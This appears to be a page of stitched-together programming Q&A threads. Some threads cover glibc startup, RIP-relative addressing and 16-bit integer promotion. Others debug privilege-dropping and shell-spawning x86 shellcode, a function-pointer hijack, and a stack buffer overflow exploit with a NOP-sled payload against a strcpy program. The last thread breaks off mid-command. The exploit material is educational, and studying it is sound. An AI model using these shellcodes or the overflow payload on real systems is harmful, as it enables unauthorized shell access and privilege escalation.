Executing shell code using a function pointer present in Union - c

I am trying to inject shell code into the char buffer and execute it using the function pointer. both string and function pointer are in the union. Below is the shell code I am using trying to execute
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
0: 31 c0 xor eax, eax
2: b0 46 mov al, 0x46 ; setreuid (70)
4: 31 db xor ebx, ebx ; real uid
6: 31 c9 xor ecx, ecx ; effective uid
8: cd 80 int 0x80 ; setreuid(0, 0)
a: eb 16 jmp 0x22 ; jump to call at end
c: 5b pop ebx ; get address of "/bin/sh"
d: 31 c0 xor eax, eax
f: 88 43 07 mov BYTE PTR[ebx + 0x7], al ; zero terminate "/bin/sh"
12: 89 5b 08 mov DWORD PTR[ebx + 0x8], ebx ; + address of "/bin/sh"
15: 89 43 0c mov DWORD PTR[ebx + 0xc], eax ; + NULL pointer
18: b0 0b mov al, 0x0b ; execve (11)
1a: 8d 4b 08 lea ecx, [ebx + 0x8] ; load argv (ptr to "/bin/sh")
1d: 8d 53 0c lea edx, [ebx + 0xc] ; load envp (NULL)
20: cd 80 int 0x80 ; execve("/bin/sh", "/bin/sh", NULL)
22: e8 e5 ff ff ff call 0x0c ; push address on the stack
27: "/bin/sh" ; and jump back
union array_or_function_pointer
{
char string[128];
void (*callback)(void);
};
void trialversion()
{
printf("This is a trial version. Please purchase the full version to enable all features!\n");
}
int main(int argc, char *argv[])
{
FILE *fp;
union array_or_function_pointer obj;
fp = fopen(argv[1], "r");
obj.callback = trialversion;
obj.callback();
fread(obj.string, 128, 1, fp);
obj.callback();
fclose(fp);
return 0;
}
The shell code is not being executed and I am getting segemntation fault as shown below. I have used -z execstack.
gcc -g -fno-stack-protector -z execstack sample.c -o sample
harsha#hv-XPS:~/ass6$ ./sample pass_junk.txt
This is a trial version. Please purchase the full version to enable all features!
Segmentation fault (core dumped)
The problem seems to be that program is checking the address present in the shell code

Usually a pointer to function variable is implemented as memory containing the address of the first instruction of the function to be called. You're putting instructions directly in obj, not an address.
To get this sort of test exploit to work, you would need to both get the injected instructions somewhere into memory, and also put the address of the memory containing those instructions into obj.callback. But this will be tricky because most operating systems use Address Space Layout Randomization to make it difficult to predict exactly where objects in the stack will be.

Add sizeof(void(*)()) dummy bytes (eg. \x90\x90\x90\x90) at the beginning of your shellcode.
Then:
#include <stdio.h>
union array_or_function_pointer
{
char code[/* size */];
void(*callback)(void);
};
void foo(void) { puts("foo()"); }
int main(int argc, char **argv)
{
union array_or_function_pointer obj;
obj.callback = foo;
obj.callback();
FILE *fp = fopen(argv[1], "rb");
fread(obj.code, 1, /* size */, fp);
fclose(fp);
obj.callback = &obj.callback + 1; // the code is located *behind*
obj.callback(); // the pointer value.
}

Related

How is main() called? Call to main() inside __libc_start_main()

I am trying to understand the call to main() inside __libc_start_main(). I know one of the parameters of __libc_start_main() is the address of main(). But, I am not able to figure out how is main() being called inside __libc_start_main() as there is no Opcode CALL or JMP. I see the following disassembly right before execution jumps to main().
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
I wrote a simple "Hello, World!!" in C. In the assembly above:
The execution jumps to main() right after instruction at address 0x7ffff7ded099.
Why is the MOV (to RAX) instruction causing a jump to main()?
Well, of course those instructions are not the ones that cause the call to main. I am not sure how you are stepping through those instructions, but if you are using GDB, you should use stepi instead of nexti.
I don't know why this happens precisely (some strange GDB or x86 quirk?) so I only speak from personal experience, but when reverse-engineering ELF binaries, I occasionally find that the nexti command executes several instructions before breaking. In your case, it misses a few movs before the actual call rax to call main().
What you can do to remediate this is to either use stepi, or to dump more code and then explicitly tell GDB to set breakpoints:
(gdb) x/20i
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
... more lines ...
... find call rax ...
(gdb) b *0x7ffff7dedXXX <= replace this
(gdb) continue
Here's what __libc_start_main() on my system does to call main():
21b6f: 48 8d 44 24 20 lea rax,[rsp+0x20] ; start preparing args
21b74: 64 48 89 04 25 00 03 mov QWORD PTR fs:0x300,rax
21b7b: 00 00
21b7d: 48 8b 05 24 93 3c 00 mov rax,QWORD PTR [rip+0x3c9324]
21b84: 48 8b 74 24 08 mov rsi,QWORD PTR [rsp+0x8]
21b89: 8b 7c 24 14 mov edi,DWORD PTR [rsp+0x14]
21b8d: 48 8b 10 mov rdx,QWORD PTR [rax]
21b90: 48 8b 44 24 18 mov rax,QWORD PTR [rsp+0x18] ; get address of main
21b95: ff d0 call rax ; actual call to main()
21b97: 89 c7 mov edi,eax
21b99: e8 32 16 02 00 call 431d0 <exit##GLIBC_2.2.5> ; exit(result of main)
The first three instructions are the same that you show. At the moment of call rax, rax will contain the address of main. After calling main, the result is moved into edi (first argument) and exit(result) is called.
Looking at glibc's source code for __libc_start_main(), we can see that this is exactly what happens:
/* ... */
#ifdef HAVE_CLEANUP_JMP_BUF
int not_first_call;
not_first_call = setjmp ((struct __jmp_buf_tag *) unwind_buf.cancel_jmp_buf);
if (__glibc_likely (! not_first_call))
{
/* ... a bunch of stuff ... */
/* Run the program. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
}
else
{
/* ... a bunch of stuff ... */
}
#else
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
#endif
exit (result);
}
In my case I can see from the disassembly that HAVE_CLEANUP_JMP_BUF was defined when my glibc was compiled, so the actual call to main() is the one inside the if. I also suspect this is the case for your glibc.

How does this program know the exact location where this string is stored?

I have disassembled a C program with Radare2. Inside this program there are many calls to scanf like the following:
0x000011fe 488d4594 lea rax, [var_6ch]
0x00001202 4889c6 mov rsi, rax
0x00001205 488d3df35603. lea rdi, [0x000368ff] ; "%d" ; const char *format
0x0000120c b800000000 mov eax, 0
0x00001211 e86afeffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)
0x00001216 8b4594 mov eax, dword [var_6ch]
0x00001219 83f801 cmp eax, 1 ; rsi ; "ELF\x02\x01\x01"
0x0000121c 740a je 0x1228
Here scanf has the address of the string "%d" passed to it from the line lea rdi, [0x000368ff]. I'm assuming 0x000368ff is the location of "%d" in the exectable file because if I restart Radare2 in debugging mode (r2 -d ./exec) then lea rdi, [0x000368ff] is replaced by lea rdi, [someMemoryAddress].
If lea rdi, [0x000368ff] is whats hard coded in the file then how does the instruction change to the actual memory address when run?
Radare is tricking you, what you see is not the real instruction, it has been simplified for you.
The real instruction is:
0x00001205 488d3df3560300 lea rdi, qword [rip + 0x356f3]
0x0000120c b800000000 mov eax, 0
This is a typical position independent lea. The string to use is stored in your binary at the offset 0x000368ff, but since the executable is position independent, the real address needs to be calculated at runtime. Since the next instruction is at offset 0x0000120c, you know that, no matter where the binary is loaded in memory, the address you want will be rip + (0x000368ff - 0x0000120c) = rip + 0x356f3, which is what you see above.
When doing static analysis, since Radare does not know the base address of the binary in memory, it simply calculates 0x0000120c + 0x356f3 = 0x000368ff. This makes reverse engineering easier, but can be confusing since the real instruction is different.
As an example, the following program:
int main(void) {
puts("Hello world!");
}
When compiled produces:
6b4: 48 8d 3d 99 00 00 00 lea rdi,[rip+0x99]
6bb: e8 a0 fe ff ff call 560 <puts#plt>
So rip + 0x99 = 0x6bb + 0x99 = 0x754, and if we take a look at offset 0x754 in the binary with hd:
$ hd -s 0x754 -n 16 a.out
00000754 48 65 6c 6c 6f 20 77 6f 72 6c 64 21 00 00 00 00 |Hello world!....|
00000764
The full instruction is
48 8d 3d f3 56 03 00
This instruction is literally
lea rdi, [rip + 0x000356f3]
with a rip relative addressing mode. The instruction pointer rip has the value 0x0000120c when the instruction is executed, thus rdi receives the desired value 0x000368ff.
If this is not the real address, it is possible that your program is a position-independent executable (PIE) which is subject to relocation. Since the address is encoded using a rip-relative addressing mode, no relocation is needed and the address is correct, regardless of where the binary is loaded.

How can I force the size of an int for debugging purposes?

I have two builds for a piece of software I'm developing, one for an embedded system where the size of an int is 16 bits, and another for testing on the desktop where the size of an int is 32 bits. I am using fixed width integer types from <stdint.h>, but integer promotion rules still depend on the size of an int.
Ideally I would like something like the following code to print 65281 (integer promotion to 16 bits) instead of 4294967041 (integer promotion to 32 bits) because of integer promotion, so that it exactly matches the behavior on the embedded system. I want to be sure that code which gives one answer during testing on my desktop gives the exact same answer on the embedded system. A solution for either GCC or Clang would be fine.
#include <stdio.h>
#include <stdint.h>
int main(void){
uint8_t a = 0;
uint8_t b = -1;
printf("%u\n", a - b);
return 0;
}
EDIT:
The example I gave might not have been the best example, but I really do want integer promotion to be to 16 bits instead of 32 bits. Take the following example:
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>
int main(void){
uint16_t a = 0;
uint16_t b = 1;
uint16_t c = a - 2; // "-2": 65534
uint16_t d = (a - b) / (a - c);
printf("%" PRIu16 "\n", d);
return 0;
}
The output is 0 on a 32-bit system because of truncation from integer division after promotion to a (signed) int, as opposed to 32767.
The best answer so far seem to be to use an emulator, which is not what I was hoping for, but I guess does make sense. It does seem like it should be theoretically possible for a compiler to generate code that behaves as if the size of an int were 16 bits, but I guess it maybe shouldn't be too surprising that there's no easy way in practice to do this, and there's probably not much demand for such a mode and any necessary runtime support.
EDIT 2:
This is what I've explored so far: there is in fact a version of GCC which targets the i386 in 16-bit mode at https://github.com/tkchia/gcc-ia16. The output is a DOS COM file, which can be run in DOSBox. For instance, the two files:
test.c
#include <stdint.h>
uint16_t result;
void test16(void){
uint16_t a = 0;
uint16_t b = 1;
uint16_t c = a - 2; // "-2": 65534
result = (a - b) / (a - c);
}
main.c
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>
extern uint16_t result;
void test16(void);
int main(void){
test16();
printf("result: %" PRIu16"\n", result);
return 0;
}
can be compiled with
$ ia16-elf-gcc -Wall test16.c main.c -o a.com
to produce a.com which can be run in DOSBox.
D:\>a
result: 32767
Looking into things a little further, ia16-elf-gcc does in fact produce a 32-bit elf as an intermediate, although the final link output by default is a COM file:
$ ia16-elf-gcc -Wall -c test16.c -o test16.o
$ file test16.o
test16.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
I can force it to link with main.c compiled with regular GCC, but not surprisingly, the resulting executable segfaults.
$ gcc -m32 -c main.c -o main.o
$ gcc -m32 -Wl,-m,elf_i386,-s,-o,outfile test16.o main.o
$ ./outfile
Segmentation fault (core dumped)
From a post here, it seems like it should theoretically be possible to link the 16-bit code output from ia16-elf-gcc to 32-bit code, although I'm not actually sure how. Then there is also the issue of actually running 16-bit code on a 64-bit OS. More ideal would be a compiler that still uses regular 32-bit/64-bit registers and instructions for performing the arithmetic, but emulates the arithmetic through library calls similar to how for instance a uint64_t is emulated on a (non-64-bit) microcontroller.
The closest I could find for actually running 16-bit code on x86-64 is here, and that seems experimental/completely unmaintained. At this point, just using an emulator is starting to seem like the best solution, but I will wait a little longer and see if anyone else has any ideas.
EDIT 3
I'm going to go ahead and accept antti's answer, although it's not the answer I was hoping to hear. If anyone is interested in what the output of ia16-elf-gcc is (I'd never even heard of ia16-elf-gcc before), here is the disassembly:
$ objdump -M intel -mi386 -Maddr16,data16 -S test16.o > test16.s
Notice that you must specify that it is 16 bit code, otherwise objdump interprets it as 32-bit code, which maps to different instructions (see further down).
test16.o: file format elf32-i386
Disassembly of section .text:
00000000 <test16>:
0: 55 push bp ; save frame pointer
1: 89 e5 mov bp,sp ; copy SP to frame pointer
3: 83 ec 08 sub sp,0x8 ; allocate 4 * 2bytes on stack
6: c7 46 fe 00 00 mov WORD PTR [bp-0x2],0x0 ; uint16_t a = 0
b: c7 46 fc 01 00 mov WORD PTR [bp-0x4],0x1 ; uint16_t b = 1
10: 8b 46 fe mov ax,WORD PTR [bp-0x2] ; ax = a
13: 83 c0 fe add ax,0xfffe ; ax -= 2
16: 89 46 fa mov WORD PTR [bp-0x6],ax ; uint16_t c = ax = a - 2
19: 8b 56 fe mov dx,WORD PTR [bp-0x2] ; dx = a
1c: 8b 46 fc mov ax,WORD PTR [bp-0x4] ; ax = b
1f: 29 c2 sub dx,ax ; dx -= b
21: 89 56 f8 mov WORD PTR [bp-0x8],dx ; temp = dx = a - b
24: 8b 56 fe mov dx,WORD PTR [bp-0x2] ; dx = a
27: 8b 46 fa mov ax,WORD PTR [bp-0x6] ; ax = c
2a: 29 c2 sub dx,ax ; dx -= c (= a - c)
2c: 89 d1 mov cx,dx ; cx = dx = a - c
2e: 8b 46 f8 mov ax,WORD PTR [bp-0x8] ; ax = temp = a - b
31: 31 d2 xor dx,dx ; clear dx
33: f7 f1 div cx ; dx:ax /= cx (unsigned divide)
35: 89 c0 mov ax,ax ; (?) ax = ax
37: 89 c0 mov ax,ax ; (?) ax = ax
39: a3 00 00 mov ds:0x0,ax ; ds[0] = ax
3c: 90 nop
3d: 89 c0 mov ax,ax ; (?) ax = ax
3f: 89 ec mov sp,bp ; restore saved SP
41: 5d pop bp ; pop saved frame pointer
42: 16 push ss ; ss
43: 1f pop ds ; ds =
44: c3 ret
Debugging the program in GDB, this instruction causes the segfault
movl $0x46c70000,-0x2(%esi)
Which is the first two move instructions for setting the value of a and b interpreted with the instruction decoded in 32-bit mode. The relevant disassembly (not specifying 16-bit mode) is as follows:
$ objdump -M intel -S test16.o > test16.s && cat test16.s
test16.o: file format elf32-i386
Disassembly of section .text:
00000000 <test16>:
0: 55 push ebp
1: 89 e5 mov ebp,esp
3: 83 ec 08 sub esp,0x8
6: c7 46 fe 00 00 c7 46 mov DWORD PTR [esi-0x2],0x46c70000
d: fc cld
The next step would be trying to figure out a way to put the processor into 16-bit mode. It doesn't even have to be real mode (google searches mostly turn up results for x86 16-bit real mode), it can even be 16-bit protected mode. But at this point, using an emulator definitely seems like the best option, and this is more for my curiosity. This is all also specific to x86. For reference here's the same file compiled in 32-bit mode, which has an implicit promotion to a 32-bit signed int (from running gcc -m32 -c test16.c -o test16_32.o && objdump -M intel -S test16_32.o > test16_32.s):
test16_32.o: file format elf32-i386
Disassembly of section .text:
00000000 <test16>:
0: 55 push ebp ; save frame pointer
1: 89 e5 mov ebp,esp ; copy SP to frame pointer
3: 83 ec 10 sub esp,0x10 ; allocate 4 * 4bytes on stack
6: 66 c7 45 fa 00 00 mov WORD PTR [ebp-0x6],0x0 ; uint16_t a = 0
c: 66 c7 45 fc 01 00 mov WORD PTR [ebp-0x4],0x1 ; uint16_t b = 0
12: 0f b7 45 fa movzx eax,WORD PTR [ebp-0x6] ; eax = a
16: 83 e8 02 sub eax,0x2 ; eax -= 2
19: 66 89 45 fe mov WORD PTR [ebp-0x2],ax ; uint16_t c = (uint16_t) (a-2)
1d: 0f b7 55 fa movzx edx,WORD PTR [ebp-0x6] ; edx = a
21: 0f b7 45 fc movzx eax,WORD PTR [ebp-0x4] ; eax = b
25: 29 c2 sub edx,eax ; edx -= b
27: 89 d0 mov eax,edx ; eax = edx (= a - b)
29: 0f b7 4d fa movzx ecx,WORD PTR [ebp-0x6] ; ecx = a
2d: 0f b7 55 fe movzx edx,WORD PTR [ebp-0x2] ; edx = c
31: 29 d1 sub ecx,edx ; ecx -= edx (= a - c)
33: 99 cdq ; EDX:EAX = EAX sign extended (= a - b)
34: f7 f9 idiv ecx ; EDX:EAX /= ecx
36: 66 a3 00 00 00 00 mov ds:0x0,ax ; ds = (uint16_t) ax
3c: 90 nop
3d: c9 leave ; esp = ebp (restore stack pointer), pop ebp
3e: c3 ret
You can't, unless you find some very special compiler. It would break absolutely everything, including your printf call. The code generation in the 32-bit compiler might not even be able to produce the 16-bit arithmetic code as it is not commonly needed.
Have you considered using an emulator instead?
You need an entire runtime environment including all the necessary libraries to share the ABI you're implementing.
If you want to run your 16-bit code on a 32-bit system, your most likely chance of success is to run it in a chroot that has a comparable runtime environment, possibly using qemu-user-static if you need ISA translation too. That said, I'm not sure that any of the platforms supported by QEMU has a 16-bit ABI.
It might be possible to write yourself a set of 16-bit shim libraries, backed by your platform's native libraries - but I suspect the effort would outweigh the benefit to you.
Note that for the specific case of running 32-bit x86 binaries on a 64-bit amd64 host, Linux kernels are often configured with dual-ABI support (you still need the appropriate 32-bit libraries, of course).
You could make the code itself be more aware about the data sizes it is handling, by for example doing:
printf("%hu\n", a - b);
From fprintf's docs:
h
Specifies that a following d, i, o, u, x, or X conversion specifier applies to a short int or unsigned short int argument (the argument will have been promoted according to the integer promotions, but its value shall be converted to short int or unsigned short int before printing);

Shellcode Segmentation Fault error when run from exploitable program

BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rbx
xor al,al
xor cx,cx
mov al,8
mov cx,0755
int 0x80
xor al,al
inc al
xor bl,bl
int 0x80
two:
call one
db 'H'`
This is my assembly code.
Then I used two commands. "nasm -f elf64 newdir.s -o newdir.o" and "ld newdir.o -o newdir".I run ./newdir and worked fine but when I extracted op code and tried to test this shellcode using following c program . It is not working(no segmentation fault).I have compiled using cmd gcc newdir -z execstack
#include <stdio.h>
char sh[]="\xeb\x16\x5b\x30\xc0\x66\x31\xc9\xb0\x08\x66\xb9\xf3\x02\xcd\x80\x30\xc0\xfe\xc0\x30\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x48";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
objdump -d newdir
newdir: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: eb 16 jmp 400098 <two>
0000000000400082 <one>:
400082: 5b pop %rbx
400083: 30 c0 xor %al,%al
400085: 66 31 c9 xor %cx,%cx
400088: b0 08 mov $0x8,%al
40008a: 66 b9 f3 02 mov $0x2f3,%cx
40008e: cd 80 int $0x80
400090: 30 c0 xor %al,%al
400092: fe c0 inc %al
400094: 30 db xor %bl,%bl
400096: cd 80 int $0x80
0000000000400098 <two>:
400098: e8 e5 ff ff ff callq 400082 <one>
40009d: 48 rex.W
when I run ./a.out , I am getting something like in photo. I am attaching photo because I cant explain what is happening.image
P.S- My problem is resolved. But I wanted to know where things was going wrong. So I used debugger and the result is below
`
(gdb) list
1 char shellcode[] = "\xeb\x16\x5b\x30\xc0\x66\x31\xc9\xb0\x08\x66\xb9\xf3\x02\xcd\x80\x30\xc0\xfe\xc0\x30\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x48";
2 int main (int argc, char **argv)
3 {
4 int (*ret)();
5 ret = (int(*)())shellcode;
6
7 (int)(*ret)();
8 } (gdb) disassemble main
Dump of assembler code for function main:
0x00000000000005fa <+0>: push %rbp
0x00000000000005fb <+1>: mov %rsp,%rbp
0x00000000000005fe <+4>: sub $0x20,%rsp
0x0000000000000602 <+8>: mov %edi,-0x14(%rbp)
0x0000000000000605 <+11>: mov %rsi,-0x20(%rbp)
0x0000000000000609 <+15>: lea 0x200a20(%rip),%rax # 0x201030 <shellcode>
0x0000000000000610 <+22>: mov %rax,-0x8(%rbp)
0x0000000000000614 <+26>: mov -0x8(%rbp),%rdx
0x0000000000000618 <+30>: mov $0x0,%eax
0x000000000000061d <+35>: callq *%rdx
0x000000000000061f <+37>: mov $0x0,%eax
0x0000000000000624 <+42>: leaveq
0x0000000000000625 <+43>: retq
End of assembler dump.
(gdb) b 7
Breakpoint 1 at 0x614: file test.c, line 7.
(gdb) run
Starting program: /root/Desktop/Progs/shell/a.out
Breakpoint 1, main (argc=1, argv=0x7fffffffe2b8) at test.c:7
7 (int)(*ret)();
(gdb) info registers rip
rip 0x555555554614 0x555555554614 <main+26>
(gdb) x/5i $rip
=> 0x555555554614 <main+26>: mov -0x8(%rbp),%rdx
0x555555554618 <main+30>: mov $0x0,%eax
0x55555555461d <main+35>: callq *%rdx
0x55555555461f <main+37>: mov $0x0,%eax
0x555555554624 <main+42>: leaveq
(gdb) s
(Control got stuck here, so i pressed ctrl+c)
^C
Program received signal SIGINT, Interrupt.
0x0000555555755048 in shellcode ()
(gdb) x/5i 0x0000555555755048
=> 0x555555755048 <shellcode+24>: callq 0x555555755032 <shellcode+2>
0x55555575504d <shellcode+29>: rex.W add %al,(%rax)
0x555555755050: add %al,(%rax)
0x555555755052: add %al,(%rax)
0x555555755054: add %al,(%rax)
Here is the debugging information. I am not able to find where the control goes wrong.If need more info please ask.
Below is a working example using x86-64; which could be further optimized for size. That last 0x00 null is ok for the purpose of executing the shellcode.
assemble & link:
$ nasm -felf64 -g -F dwarf pushpam_001.s -o pushpam_001.o && ld pushpam_001.o -o pushpam_001
Code:
BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rdi ; pathname
xor rax, rax
add al, 85 ; creat syscall 64-bit Linux
xor rsi, rsi
add si, 0755 ; mode - octal
syscall
xor rax, rax
add ax, 60
xor rdi, rdi
syscall
two:
call one
db 'H',0
objdump:
pushpam_001: file format elf64-x86-64
0000000000400080 <_start>:
400080: eb 1c jmp 40009e <two>
0000000000400082 <one>:
400082: 5f pop rdi
400083: 48 31 c0 xor rax,rax
400086: 04 55 add al,0x55
400088: 48 31 f6 xor rsi,rsi
40008b: 66 81 c6 f3 02 add si,0x2f3
400090: 0f 05 syscall
400092: 48 31 c0 xor rax,rax
400095: 66 83 c0 3c add ax,0x3c
400099: 48 31 ff xor rdi,rdi
40009c: 0f 05 syscall
000000000040009e <two>:
40009e: e8 df ff ff ff 48 00
.....H.
encoding extraction: There are many other ways to do this.
$ for i in `objdump -d pushpam_001 | grep "^ " | cut -f2`; do echo -n '\x'$i; done; echo
\xeb\x1c\x5f\x48\x31\xc0\x04\x55\x48\x31\xf6\x66\x81\xc6\xf3\x02\x0f\x05\x48\x31\xc0\x66\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdf\xff\xff\xff\x48\x00\x.....H.
C shellcode.c - partial
...
unsigned char code[] = \
"\xeb\x1c\x5f\x48\x31\xc0\x04\x55\x48\x31\xf6\x66\x81\xc6\xf3\x02\x0f\x05\x48\x31\xc0\x66\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdf\xff\xff\xff\x48\x00";
...
final:
./shellcode
--wxrw---t 1 david david 0 Jan 31 12:25 H
If int 0x80 in 64-bit code was the only problem, building your C test with gcc -fno-pie -no-pie would have worked, because then char sh[] would be in the low 32 bits of virtual address space, so system calls that truncate pointers to 32 bits would still work.
Run your program under strace to see what system calls it actually makes. (Except that strace decodes int 0x80 syscalls incorrectly in 64-bit code, decoding as if you'd used the 64-bit syscall ABI. The call numbers and arg registers are different.) But at least you can see the system-call return values (which will be -EFAULT for 32-bit creat with a truncated 64-bit pointer.)
You can also just gdb to single-step and check the system call return values. Having strace decode the system-call inputs is really nice, though, so I'd recommend porting your code to use the 64-bit ABI, and then it would just work.
Also, it would actually be able to exploit 64-bit processes where the buffer overflow is in memory at an address outside the low 32 bits. (e.g. like the stack). So yes, you should really stop using int 0x80 or stick to 32-bit code.
You're also depending on registers being zeroed before your code runs, like they are on process startup, but not when called from anywhere else.
xor al,al before mov al,8 is completely pointless, because xor-zeroing al doesn't clear upper bytes. Writing 32-bit registers clears the upper 32, but not writing 8 or 16 bit registers. And if it did, you wouldn't need the xor-zeroing before using mov which is also write-only.
If you want to set RAX=8 without any zero bytes in the machine code, you can
push 8 / pop rax (3 bytes)
xor eax,eax / mov al,8 (4 bytes)
Or given a zeroed rcx register, lea eax, [rcx+8] (3 bytes)
Setting CX to 0755 isn't so simple, because the constant doesn't fit in an imm8. Your 16-bit mov is a good choice (or would have been if you'd zeroed rcx first.
xor ecx,ecx
lea eax, [rcx+8] ; SYS_creat = 8 from unistd_32.h
mov cx, 0755 ; mode
int 0x80 ; invoke 32-bit ABI
xor ebx,ebx
lea eax, [rbx+1] ; SYS_exit = 1
int 0x80

Syscall inside shellcode won't run

Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.
I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.
I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve() to get a shell does not work.
In more details:
This is the code of the vulnerable program (compiled in a Ubuntu 15.04 x88-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with the ASLR turned off):
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int do_bof(char *exploit) {
char buf[128];
strcpy(buf, exploit);
return 1;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
puts("Usage: bof <any>");
return 0;
}
do_bof(argv[1]);
puts("Failed to exploit.");
return 0;
}
This is a small assembly program that spawn a shell and then exits. Note that this code will work independently. This is: If I assemble, link and run this code alone, it will work.
global _start
section .text
_start:
jmp short push_shell
starter:
pop rdi
mov al, 59
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
syscall
xor al, al
mov BYTE [rdi], al
mov al, 60
syscall
push_shell:
call starter
shell:
db "/bin/sh"
This is the output of a objdump -d -M intel of the above program, where the shellcode were extracted from (note: the language of the output is portuguese):
spawn_shell.o: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000000000 <_start>:
0: eb 16 jmp 18 <push_shell>
0000000000000002 <starter>:
2: 5f pop rdi
3: b0 3b mov al,0x3b
5: 48 31 f6 xor rsi,rsi
8: 48 31 d2 xor rdx,rdx
b: 48 31 c9 xor rcx,rcx
e: 0f 05 syscall
10: 30 c0 xor al,al
12: 88 07 mov BYTE PTR [rdi],al
14: b0 3c mov al,0x3c
16: 0f 05 syscall
0000000000000018 <push_shell>:
18: e8 e5 ff ff ff call 2 <starter>
000000000000001d <shell>:
1d: 2f (bad)
1e: 62 (bad)
1f: 69 .byte 0x69
20: 6e outs dx,BYTE PTR ds:[rsi]
21: 2f (bad)
22: 73 68 jae 8c <shell+0x6f>
This command would be the payload, which inject the shellcode along with the needed nop sleed and the return address that will overwrite the original return address:
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:
The return address is correctly overwritten and the execution jumps to my shellcode.
The execution goes alright until the "e:" line of my assembly program, where the syscall to execve() happens.
The syscall simply does not work, even with the register correctly set up to do a syscall. Strangely, after this line, the RAX and RCX register bits are all set up.
The result is that the execution goes to the non-conditional jump that pushes the address of the shell again and a infinity loop starts until the program crash in a SEGFAULT.
That's the main problem: The syscall won't work.
Some notes:
Some would say that my "/bin/sh" strings needs to be null terminated. Well, it does not seem to be necessary, nasm seems to put a null byte implicitly, and my assembly program works, as I stated.
Remember it's a 64 bit shellcode.
This shellcode works in the following code:
char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
void (*func)();
func = (void (*)()) shellcode;
(void)(func)();
}
What's wrong with my shellcode?
EDIT 1:
Thanks to the answer of Jester, the first problem was solved. Additionaly, I discovered that a shellcode has not the requirement of work alone. The new Assembly code for the shellcode is:
spawn_shell: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000400080 <_start>:
400080: eb 1e jmp 4000a0 <push_shell>
0000000000400082 <starter>:
400082: 5f pop %rdi
400083: 48 31 c0 xor %rax,%rax
400086: 88 47 07 mov %al,0x7(%rdi)
400089: b0 3b mov $0x3b,%al
40008b: 48 31 f6 xor %rsi,%rsi
40008e: 48 31 d2 xor %rdx,%rdx
400091: 48 31 c9 xor %rcx,%rcx
400094: 0f 05 syscall
400096: 48 31 c0 xor %rax,%rax
400099: 48 31 ff xor %rdi,%rdi
40009c: b0 3c mov $0x3c,%al
40009e: 0f 05 syscall
00000000004000a0 <push_shell>:
4000a0: e8 dd ff ff ff callq 400082 <starter>
4000a5: 2f (bad)
4000a6: 62 (bad)
4000a7: 69 .byte 0x69
4000a8: 6e outsb %ds:(%rsi),(%dx)
4000a9: 2f (bad)
4000aa: 73 68 jae 400114 <push_shell+0x74>
If I assemble and link it, it will not work, but if a inject this in another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL terminated string "/bin/sh". The OS seems to do an initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: The real reason of my syscall didn't have succeeded is that the "/bin/sh" string was not NULL terminated in runtime, but it worked as a standalone program because in this case, it was NULL terminated.
Therefore, you shellcode run alright as a standalone program is not a proof that it works.
The exploitation was successfull... At least in GDB. Now I have a new problem: The exploit works inside GDB, but doesn't outside it.
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\ x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
